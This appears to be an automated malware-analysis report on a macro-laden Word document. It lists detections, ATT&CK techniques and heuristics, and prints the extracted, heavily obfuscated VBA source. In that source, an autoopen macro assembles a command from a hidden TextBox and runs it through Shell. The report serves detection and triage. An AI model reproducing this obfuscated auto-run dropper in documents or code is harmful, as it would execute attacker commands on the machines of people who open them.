MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro is present and triggers the execution of a function that uses the Shell() function, indicating an attempt to run external commands. This is further supported by heuristics indicating suspicious cmd.exe and PowerShell invocations. The primary function of the script appears to be executing arbitrary code, likely for downloading and running a second-stage payload.
Heuristics 10
-
ClamAV: Doc.Malware.Sload-6784187-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sload-6784187-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
_ .Shell(mXSIvmQt, swnrzoF), jPRrSKz) Set vtTRSDbGTCcSNBMPID = PfMTfQsVAYwbqlqXlSv -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() hdCaNY -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9560 bytes |
SHA-256: 396f16fce4e4815e67b029145ed9f54c0b44bda4d614c247e14c9c81476094ed |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
264 of 305 identifiers look randomly generated (e.g. 'cmpwwwBYFWFSuGfWhzwsGcKa') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ffvbdMdNr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
hdCaNY
End Sub
Attribute VB_Name = "wiQQzlOiKpLEl"
Function hdCaNY()
On Error Resume Next
Set qopQKDdRzczFUucQQUb = hlMqffFQzzzlZbBbrdcVtF
Select Case mmhPlGYzrwvtFbwkizNRAiNf
Case 298978386
BZnsGwbpaDzQUKbBFoihwzs = zYfovHZCWrEzKzqwRPBvmOd
qzYYALwCjuuiQn = 301370277
ivucFcqGwfQjzzFivc = wiBBKuCSPEIhdViQrTAzOISa
Case 137731007
QEioMnoqzkdujhDJaBpwmLP = CByte(OOuiioPbjPizkasVsnYz)
wjStFhRkWIFpBazsJIIUCO = ChrW(CFZAITFzmRtSibkcGw)
JGZIiAvdjfQdlhPQnjhIQR = Log(SYIHSQYfBWLENdz)
End Select
Set PWNQGjiLTIhiHNYG = rtAzIKzaVaGiRmZ
Select Case QmQcZbMvjVoCRPpjVbknlP
Case 47181548
OqlJXdBVIuqbIiiQ = EOmVzIFlaNqBlBBfEOipD
FTStXYNYqtUGjAUqQi = 211984340
zQKUXspwDQzaihITDEl = XCWzhfVAKOzAJfZpIwWi
Case 233520196
UattbzrBnMzzAvtNn = CByte(XolpSzRzHTKFhGwGhwDoDVI)
alDJfivvLiGufiHu = ChrW(crYqhiqCtNzJwoBfbOh)
HTdYOuDzCaCoJMaikSsGMGlQ = Log(mMqFPEPawTINAcnbqATKIzmN)
End Select
Set vEcNwXnfzWETWaSXtJ = nEqlCPjmlQiwFMnKcCIoS
Select Case ZCkJiqmkXQDWaSFSawO
Case 243499629
OSazHiPqVkVRMf = BsjtAAtOsilVFJcKZhZKjJ
bHWuCjiENnRRhSVk = 6862674
EiQVNJjsavjnUDrhEm = GqhJdXiorurEzXpfbuGu
Case 85878774
JFnVaSNaANjHuiWY = CByte(ziVowirmPfYPnwrQshcVIz)
aRuiVqdKIDGIPrYKX = ChrW(iKnpKMOrqBzuCizOvXEDVwlU)
MjqcYTWFZZmckHhQi = Log(bNOAcIBwBGTamYSazfYPSiap)
End Select
Set LlYfcDtjQcrNdzXbkGjwl = VdOPsSMnkRoDLSurfIAjDo
Select Case HpkfWccGbwZPuRMLaXcs
Case 166336082
anEjsaXzChjzGZInpKH = NGlCzaSzaLbwGiPw
pkBidurizKmCniRkNLT = 14096711
hRIZXqGkrXKLMz = FcjLtTCQjumdJMsXvuZ
Case 57032218
tIGElwFmcrbjrilcII = CByte(iBbfkMwYwAPQmqHMTdHIV)
dEDLuShHunmrdRRdVsoZHmMa = ChrW(skSRwBzMiYXbZSiqrFbivM)
uqHOTvprrcXChPpwmmivtt = Log(waKjPjlwsfuYbr)
End Select
Set KSQuOuQHjpIkMSb = NwZrQJpzRZsUhvzfjcJcdFA
Select Case JtqLzdkuVfhsUEoAdRd
Case 269504232
wZorcDjJzPHvBh = TiBnozwCOFLcnIwMbL
NTCTVZAlWQZwSWRhwQ = 278079288
EzXalQbvAADjkf = EQKjNoMblpJtGWaAwl
Case 76570695
PvciEwFkWNtLnBNRn = CByte(cMsVmlbXUZaAGuYOFIncb)
ibFYvzFFJJMMJzZtJ = ChrW(GhdjKWGwnYwEdLINdQQNpiR)
PQnulYpLzwWtlCRjR = Log(KhJEjBDwWIdvCcPOQtiLMOjk)
End Select
Const swnrzoF = 0
Set HdDckjMnCatcjz = joajOiMGGXfGzuk
Select Case ipVQLCrqsOSrZCwVPmMkanaT
Case 306590448
wFEZPtRcLnNjuhzkqz = VhDaKqKhAYvPCVoFm
TwYZwrJIjsinqwaDZptiu = 228558908
LQEQYKNFcKwXArv = LRBKSCNhwowwwMHqkuMIr
Case 181952003
zSmCcrYZMiEhNsYmJDWRj = CByte(RHQCInGimtkjErjA)
qaPmStiuzLIDFUKBlBfmZ = ChrW(lSisLzhohFIRjqTazNlIK)
wajYZiTpBNLHpwDZihN = Log(iCvnoTiKCRBRYJUI)
End Select
Set BBmulEpbjpHXnh = lZDUHXmEjlwPjPEm
Select Case kuXwMSDPFiPJDlra
Case 298180131
XPCDfOwDImpILbCumt = NZGAFBoWujAGonrh
KjOIBJJQazWoGJwwQf = 329574273
PzCrsBXIfAVTufjGi = MPwjiERioWCIYH
Case 302419667
HMiXQzmBlZbCtaZrU = CByte(SiTfSzZJNAFXcNZdY)
cHkNdvwEcPpNzKnIpL = ChrW(btjzHllvOzOcPCCPMfFEYhNV)
UADvjTYOfwcvJcbs = Log(jHOmZLuubdjHZufLnnliAidq)
End Select
Set StPTjwNQKYPBTzAC = MilMYAzwzCMvvcV
Select Case BYEzFSDwwEAjuHLCWnJEBz
Case 301761482
SWluAVOvuLSawDBufmPTzRC = rKYISRoCfLhjhJzbpFmipl
TlPZOjZtBUvCpwG = 189990990
XQvlVSNVoniufTBGFFWD = ZSFRjOlGIficJKZpTzTCDZv
Case 313268012
WAtwkrkZjwzqTpDbPjIvRVIc = CByte(lHCApzWJTJOsKXnwC)
MbzAHPbosnAjArRfwjh = ChrW(uwbjAfpjFIUzPvwAQlz)
ZAHjJmJWaiZEQiiOATzcZr = Log(kSDRFvQPMktwursXOWTIb)
End Select
Set UbQuSszMXwJFfKsABRH = JWNjnPMtwlHqOIDjfqmOjvdG
Select Case aJDYRZvYRSwOhGDf
Case 39388612
lpSrWHLVKftPOsHVM = IUfMMSwqFSwkjid
sQvjmwMvOPfCDFGLtzXl = 232277086
dAujCtWavKlhAqadTLI = zwmumzLmqlLszTnvpGuSY
Case 263747776
VQVFQkQdLczbhNztCi = CByte(kKwskhCfoNQpLJbRiQuuC)
IAPwsGhpMskoEJWXlYN = ChrW(bPunnRFwVcHnhJB)
cmpwwwBYFWFSuGfWhzwsGcKa = Log(lTkkwGuIXuwjRH)
End Select
Set HXzFiRbjHOFozM = lRSzspCoZSVDivBYWHdJKOs
Select Case KfMfSwSfMabvEVQMFj
Case 160259364
NOwlFpjjVCjWYvpNdWVczq = EUFUArQEbqFJviaacNlJJtE
JjDjjNvnXXsRAVipEzF = 212177086
luiCwtPNjhKPhLUoh = NvSmXqIZGfwEMoYFXm
Case 162151261
nUfZrqhBSKNBXcrlAwWn = CByte(WmkRbVWrcniPAitPsvhJGHv)
uhjwnFYPknQhvIPVL = ChrW(qXflXuzVHDpimPqS)
tlZEXOSiNRMTkfLwwQ = Log(lIKozRzUZGABrckWjlF)
End Select
Set wfLTokUIwOYLSES = stEdicRWbwRMSDGmLEZzHjc
Select Case qvZUmdDpIPrwjhaVNo
Case 292976025
SIqsHmzOfUnIRhnmDwjzscD = LHGidEkSqkDiFj
AdpJocjjwuoRQFuz = 279656126
nhAjVkbkURhiEj = kiUDSPacaHjpmTNwkM
Case 198856651
zMUHEiDIRzTqHujWa = CByte(XpNEZYmvoRHVzRaOYXOMwjLR)
bothrmqWnopFumvV = ChrW(umBwCCPsWIINwod)
szksNwiQwJclJdlTrppYQPZm = Log(pViiJpALJBpLcvzIkzsZ)
End Select
mXSIvmQt = ffvbdMdNr.TextBox1 + GkLIsAb + iQLnBP + MfRnIPLJ + utOOjEn + WjzfuWUW + whZAAdiE + jnPqV + qupdIFiA + KSsvYh + bioRtbK + tNlFAX
Set MmoSTMRWCdcZREzh = tvLFrpriQMjjvTPjwXCzdDOp
Select Case OoEODWWQGkGDDVwzn
Case 18906561
hpHJNsVhzjSqhV = cAmPNpNPoiJdsCFApANIcH
rWipYjouZhPswLYpKTZS = 176684477
PdirjcpTNLVVut = ApiAojvcJJoRLDpCoEnG
Case 31540889
hzLEGUEXbQiKJirR = CByte(UUBUiuLiPYJjRGmapHlpjd)
YliYmAtKKXRTmDpzCzZ = ChrW(wurJKrjUWFcDqsdjzWZiWN)
JznAWAHipJniduYNuQZnFuOd = Log(aGzfavUjviKWrNTPWntCOzo)
End Select
Set HTZjjSQdNRaJrALIQjb = bjjSivlhspdTnfROho
Select Case MKoLFVZjJpKIiIuwXnGBnjj
Case 244602819
oHWMjwbcsOLnYbwFPcr = hzKsjtaamDjbDnQODUasj
mtjLzMKwYErDqowdfpWB = 279952934
ijklKiCvCwzCNRIVuOQqfb = zwcRZolWiozKzaOCbtcCt
Case 38843192
bfVKuHkAJHAkoiRdGQbPNQ = CByte(IujLowCZqtIAmDd)
OzonDzqZUKQWlRqbLYMQOww = ChrW(HhKrjhfZdaNRZc)
IEGrifjoZDjpNq = Log(cSAjjVpwtnfrsKDY)
End Select
Set wiXpJzZnFiowzfHStZIhr = NWHmMfItIkpDqLfGRKl
Select Case azSrQjjwzmMwpVRAiX
Case 243863943
fLZEItowmnIwwYBPDPVdwJw = XtNVtiXtZqoPXOiXuk
JiOARTBwSCHvVODh = 99851222
SCIPOZFjmrpjziOwnrIt = BsiFrRvTAUhTrchDtQpuhhJG
Case 248199905
ZjXbLYVjQJZKWH = CByte(QlXIMGFjutbTwOUi)
TnsOwYJIzIMXijthkRw = ChrW(wYzTzcikFXUwazqiOvUNOz)
ztJQJhlNzXwcupZOT = Log(YDanPwjsKTpwiYzJAZqLYC)
End Select
Set dMJHMmnkGuBTmoPP = UkZvOchifqEOvSHl
Select Case JQMWSUECtaMOYQMpAZMn
Case 92850246
kbZhwiVLbtiIizDn = QVsVCUTHasZvsv
PvjkzlXVjizTjQmNlNYvSVth = 48554658
aVqvQizksiSTpPs = LmDBnqoiohUziuCwcsLCilRQ
Case 143228500
XDvSYJDSJGiGRjhMHiOzFzfT = CByte(wDpVaUmfrTkiVJLwMlwUWa)
VSdjCYqZXbcbFNzilraa = ChrW(wdlYDBtMjzTVaUDwl)
HBtMHtiFiOCKcwANYorKw = Log(wMocIFitumzHTZVjWs)
End Select
Set oKrIOWiKtNCtuWGwFH = hmiIawsKrojmwvGDiarGi
Select Case HICCrquqjbRlBhJCQJV
Case 84286954
WKaDwnScVOAFHfVGYHBPBF = UNtZtbJhkRmlwbw
CbNNNQftBovsBUzlRDFqFOZ = 5768189
jQoUuXiZOznnrtEh = XFjRfQUBUuVIno
Case 13400672
BjzrYHQQSnUKwZKB = CByte(EqUUvAAUTadJRbK)
aqMEqbPoPwsvJDukTziwh = ChrW(GjzWFhnHBLJYXjzzSdafFwH)
KQfspSsMEijjFTV = Log(BHwhllfLmWjEXBmJYtMpC)
End Select
WYiVv = Array(ojAXpvoJi, kRWSXB, YdlpAYHR, Interaction _
_
_
_
_
_
_
_
.Shell(mXSIvmQt, swnrzoF), jPRrSKz)
Set vtTRSDbGTCcSNBMPID = PfMTfQsVAYwbqlqXlSv
Select Case fjiXbVwalwbUJjuojanBa
Case 226120851
iWblhXdbzNVwjAosKUR = DwcSJqBoKiuHzEwAAjPDH
iHnkLnuichJwYluJcq = 145047558
QSSNwiEorbEOcjSUiYfNtc = NwzjKFqHYhSDLp
Case 169673885
jjGqBcuWpTaiDLIvoQFPzw = CByte(iBUfhKfHfEnwinmBkDdrrfM)
NYWPvjKmioXphw = ChrW(LJLvaQMdICPULWGC)
oQSIoPLvuAQqQw = Log(oqRhfjmnAvNNjOzPbl)
End Select
Set CFQsvzIkBnaNXQ = RTuEjONvbdvzfhH
Select Case qzNDYXjUBwJiWQUFfCuzs
Case 68514421
moJpPAAdCuGkPKM = tmZCmFiZKIqScnHofrbOO
RTBTGjPjFvSUANSHThFkf = 44236489
hAPnREYizTLUGBSw = JiDvzInuWYXuIdCLJTTrwwbh
Case 84231788
BosMGBiGaADOhscsvj = CByte(oppIJwhzGCLDWi)
GwBKRWLCDCHvlbPDDujY = ChrW(MfjQYCbDPzhjCldrkPdc)
mGBBvXrzHJpJAuSSttUjwn = Log(aOjpmMSfCwraZhP)
End Select
Set QwfRSKEJuXQmMFTuvSkt = fjdzOUtKFsWjBAtTcNGdhnaK
Select Case OEZJHJnMhkNBSE
Case 279495872
zofuGKFaaSEiPNsI = zzPTBziiUUPjSKJPSi
vPuEwzioEJwTsEiUEarzqwLm = 275883755
tHIvOwitNDDvRUSIiZXAWc = pEpblHwEHOJGbjJuzpzqf
Case 110034491
JXfhSmPoTRXTqYV = CByte(lOzwhINrcUfXLXlFYvjDGZf)
sZpoDNTVivNcjUcBJ = ChrW(FzGsdvjSuusRnMjjDHSZoP)
JsQKJZETiuSUhL = Log(wtIkTYdMHAszQUjkzpwzzMlX)
End Select
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.